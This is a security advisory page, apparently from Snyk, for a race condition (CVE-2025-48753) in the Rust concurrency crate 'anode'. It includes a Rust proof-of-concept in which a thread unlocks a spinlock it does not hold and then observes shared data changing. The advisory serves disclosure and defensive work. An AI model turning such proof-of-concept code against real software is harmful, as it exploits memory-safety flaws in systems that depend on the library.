Race Condition Affecting anode package, versions *


Severity

Recommended
0.0
low
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.22% (12th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-RUST-ANODE-10332670
  • published9 Jun 2025
  • disclosed24 May 2025
  • creditCXWorks

Introduced: 24 May 2025

CVE-2025-48753  (opens in a new tab)
CWE-362  (opens in a new tab)

How to fix?

A fix was pushed into the master branch but not yet published.

Overview

anode is a Concurrency library for Rust.

Affected versions of this package are vulnerable to Race Condition through the unlock function in spin_mutex.rs. An attacker can induce a state of inconsistency in the data by exploiting the timing of the lock release.

PoC

#[deny(unsafe_code)]
use std::sync::Arc;
use std::thread;
use std::time::Duration;
use anode::spinlock::SpinLock;

fn main() {
    let mut s1 = Arc::new(SpinLock::new(5));
    let mut s2 = s1.clone();
    let h = std::thread::spawn(move || {
        let mut guard = s2.lock();
        thread::sleep(Duration::from_secs(1));
        *guard = 10;
        thread::sleep(Duration::from_secs(1));
    });
    thread::sleep(Duration::from_secs(1));
    s1.unlock();
    let guard = s1.lock();
    let origin = *guard;
    for _ in 0..1000000{
        if *guard != origin {
            println!("{} {}", *guard, origin);
            break;
        }

    }
    h.join().unwrap();
}
// output:
// 10 5

CVSS Base Scores

version 4.0
version 3.1